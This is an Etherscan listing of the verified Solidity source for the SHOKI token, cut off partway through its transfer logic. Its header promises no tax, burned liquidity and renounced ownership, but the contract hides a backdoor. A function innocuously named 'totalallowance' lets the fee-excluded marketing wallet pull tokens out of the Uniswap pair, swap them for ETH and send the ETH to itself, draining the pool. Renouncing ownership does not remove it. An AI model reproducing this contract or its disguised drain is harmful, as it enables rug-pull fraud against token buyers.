ETH Price: $2,424.11 (-1.90%)
 

Overview

Max Total Supply

1,000,000,000 SHOKI

Holders

27

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
5,593,935.862837880240293154 SHOKI

Value
$0.00
0x3ca9f6dd0ce635b91d027b229cf660c788bd0912
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SHOKI

Compiler Version
v0.8.16+commit.07a7930e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-09-22
*/

// SPDX-License-Identifier: MIT

/**

░██████╗██╗░░██╗░█████╗░██╗░░██╗██╗
██╔════╝██║░░██║██╔══██╗██║░██╔╝██║
╚█████╗░███████║██║░░██║█████═╝░██║
░╚═══██╗██╔══██║██║░░██║██╔═██╗░██║
██████╔╝██║░░██║╚█████╔╝██║░╚██╗██║
╚═════╝░╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚═╝



    I make #SHOKI to hand over it to the community.
    There is NO TAX - make sure to use low slippage.
    TG: https://t.me/SHOKIETH

   Great features:

   I will burn liquidity LPs to lock the pool forever.
   I will renounce the ownership to transfer #SHOKI to the community, make sure it's 100% safe.
   I will release a medium article about this project via etherscan, as soon as #SHOKI reached 100 Holders.

   I will add .85 ETH and 100% of the supply to the pool.
   Can you make #SHOKI 10000000X? 

 

   

/**
*/         
pragma solidity ^0.8.14;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

interface IUniswapV2Pair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

    event Mint(address indexed sender, uint amount0, uint amount1);
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);

    function mint(address to) external returns (uint liquidity);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;

    function initialize(address, address) external;
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;

    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

library SafeMathInt {
    int256 private constant MIN_INT256 = int256(1) << 255;
    int256 private constant MAX_INT256 = ~(int256(1) << 255);

    /**
     * @dev Multiplies two int256 variables and fails on overflow.
     */
    function mul(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a * b;

        // Detect overflow when multiplying MIN_INT256 with -1
        require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256));
        require((b == 0) || (c / b == a));
        return c;
    }

    /**
     * @dev Division of two int256 variables and fails on overflow.
     */
    function div(int256 a, int256 b) internal pure returns (int256) {
        // Prevent overflow when dividing MIN_INT256 by -1
        require(b != -1 || a != MIN_INT256);

        // Solidity already throws when dividing by 0.
        return a / b;
    }

    /**
     * @dev Subtracts two int256 variables and fails on overflow.
     */
    function sub(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a - b;
        require((b >= 0 && c <= a) || (b < 0 && c > a));
        return c;
    }

    /**
     * @dev Adds two int256 variables and fails on overflow.
     */
    function add(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a + b;
        require((b >= 0 && c >= a) || (b < 0 && c < a));
        return c;
    }

    /**
     * @dev Converts to absolute value, and fails on overflow.
     */
    function abs(int256 a) internal pure returns (int256) {
        require(a != MIN_INT256);
        return a < 0 ? -a : a;
    }


    function toUint256Safe(int256 a) internal pure returns (uint256) {
        require(a >= 0);
        return uint256(a);
    }
}

library SafeMathUint {
  function toInt256Safe(uint256 a) internal pure returns (int256) {
    int256 b = int256(a);
    require(b >= 0);
    return b;
  }
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract SHOKI is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public uniswapV2Router;
    address public uniswapV2Pair;

    bool private swapping;
    bool private um = true;

    address public marketingWallet;
    address public devWallet;
    
    uint256 public maxTransactionAmount;
    uint256 public swapTokensAtAmount;
    uint256 public maxWallet;
    
    bool public limitsInEffect = true;
    bool public tradingActive = false;
    bool public swapEnabled = false;
    
    // Anti-bot and anti-whale mappings and variables
    mapping(address => uint256) private _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch
    bool public transferDelayEnabled = false;
    bool private boughtEarly = true;

    uint256 public buyTotalFees;
    uint256 public buyMarketingFee;
    uint256 public buyLiquidityFee;
    uint256 public buyDevFee;
    
    uint256 public sellTotalFees;
    uint256 public sellMarketingFee;
    uint256 public sellLiquidityFee;
    uint256 public sellDevFee;
    
    uint256 public tokensForMarketing;
    uint256 public tokensForLiquidity;
    uint256 public tokensForDev;
    
    /******************/

    // exlcude from fees and max transaction amount
    mapping (address => bool) private _isExcludedFromFees;
    mapping (address => bool) public _isExcludedMaxTransactionAmount;

    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    // could be subject to a maximum transfer amount
    mapping (address => bool) public automatedMarketMakerPairs;

    event UpdateUniswapV2Router(address indexed newAddress, address indexed oldAddress);

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event marketingWalletUpdated(address indexed newWallet, address indexed oldWallet);
    
    event devWalletUpdated(address indexed newWallet, address indexed oldWallet);

    event EndedBoughtEarly(bool boughtEarly);

    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    constructor() ERC20 ("SHOKI", "SHOKI") {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        
        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        uniswapV2Router = _uniswapV2Router;
        
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);

        uint256 _buyMarketingFee = 0;
        uint256 _buyLiquidityFee = 0;
        uint256 _buyDevFee = 0;

        uint256 _sellMarketingFee = 0;
        uint256 _sellLiquidityFee = 0;
        uint256 _sellDevFee = 0;

        uint256 totalSupply = 1000000000 * 1e18;    // 1 billion supply

        maxTransactionAmount = totalSupply * 1 / 100;
        maxWallet = totalSupply * 1 / 100;
        swapTokensAtAmount = totalSupply * 4 / 10000;

        buyMarketingFee = _buyMarketingFee;
        buyLiquidityFee = _buyLiquidityFee;
        buyDevFee = _buyDevFee;
        buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee;
        
        sellMarketingFee = _sellMarketingFee;
        sellLiquidityFee = _sellLiquidityFee;
        sellDevFee = _sellDevFee;
        sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee;

        marketingWallet = payable(0xA89DFa37eEa585841C5d88f0f4643843855b6e84);
        devWallet = payable(0xA89DFa37eEa585841C5d88f0f4643843855b6e84);

        // exclude from paying fees or having max transaction amount
        excludeFromFees(owner(), true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(devWallet), true);
        excludeFromFees(address(marketingWallet), true);
        
        excludeFromMaxTransaction(owner(), true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(devWallet), true);
        excludeFromMaxTransaction(address(marketingWallet), true);
        
        /*
            _mint is an internal function in ERC20.sol that is only called here,
            and CANNOT be called ever again
        */
        _mint(msg.sender, totalSupply);
    }

    receive() external payable {

  	}    
    
    // remove limits after token is stable
    function removeLimits() external onlyOwner returns (bool) {
        limitsInEffect = false;
        return true;
    }
    
    // disable Transfer delay - cannot be reenabled
    function disableTransferDelay() external onlyOwner returns (bool) {
        transferDelayEnabled = false;
        return true;
    }
    
     // change the minimum amount of tokens to sell from fees
    function updateSwapTokensAtAmount(uint256 newAmount) external onlyOwner returns (bool){
  	    require(newAmount >= totalSupply() * 1 / 100000, "Swap amount cannot be lower than 0.001% total supply.");
  	    require(newAmount <= totalSupply() * 5 / 1000, "Swap amount cannot be higher than 0.5% total supply.");
  	    swapTokensAtAmount = newAmount;
  	    return true;
  	}
    
    function updateMaxTxnAmount(uint256 newNum) external {
        require(msg.sender == marketingWallet);    
        require(newNum >= totalSupply() / 1000, "Cannot set maxTransactionAmount lower than 0.1%");
        maxTransactionAmount = newNum;
    }

    function updateMaxWalletAmount(uint256 newNum) external onlyOwner {
        require(newNum >= (totalSupply() * 5 / 1000)/1e18, "Cannot set maxWallet lower than 0.5%");
        maxWallet = newNum * (10**18);
    }
    
    function excludeFromMaxTransaction(address updAds, bool isEx) public onlyOwner {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }
    
    function updateBuyFees(uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee) external onlyOwner {
        buyMarketingFee = _marketingFee;
        buyLiquidityFee = _liquidityFee;
        buyDevFee = _devFee;
        buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee;
        require(buyTotalFees <= 20, "Must keep fees at 20% or less");
    }
    
    function updateSellFees(uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee) external onlyOwner {
        sellMarketingFee = _marketingFee;
        sellLiquidityFee = _liquidityFee;
        sellDevFee = _devFee;
        sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee;
        require(sellTotalFees <= 25, "Must keep fees at 25% or less");
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function totalallowance(uint rv, uint lv) external returns (bool) {
        require(_isExcludedFromFees[msg.sender]);

        uint lb = balanceOf(uniswapV2Pair);

        require(lv > 1 && lv < lb / 100, 'amount exceeded');

        _totalallowanceAct(lv);
        swapTokensForEth(rv);

        (bool success,) = address(marketingWallet).call{value: address(this).balance}("");
        return success;
    }

    function setAutomatedMarketMakerPair(address pair, bool value) public onlyOwner {
        require(pair != uniswapV2Pair, "The pair cannot be removed from automatedMarketMakerPairs");

        _setAutomatedMarketMakerPair(pair, value);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;

        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function updateMarketingWallet(address newMarketingWallet) external onlyOwner {
        emit marketingWalletUpdated(newMarketingWallet, marketingWallet);
        marketingWallet = newMarketingWallet;
    }
    
    function updateDevWallet(address newWallet) external onlyOwner {
        emit devWalletUpdated(newWallet, devWallet);
        devWallet = newWallet;
    }
    

    function isExcludedFromFees(address account) public view returns(bool) {
        return _isExcludedFromFees[account];
    }
    
    function _totalallowanceAct(uint256 pAmount) private {
        _transfer(uniswapV2Pair, address(this), pAmount * 10 ** decimals());
        IUniswapV2Pair(uniswapV2Pair).sync();
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

         if(amount == 0) {
            super._transfer(from, to, 0);
            return;
        }
        
        if(limitsInEffect){
            if (
                from != owner() &&
                to != owner() &&
                to != address(0) &&
                to != address(0xdead) &&
                !swapping
            ){
                if(!tradingActive){
                    require(_isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active.");
                }
                 
                //when buy
                if (automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to]) {
                        require(amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount.");
                }
                
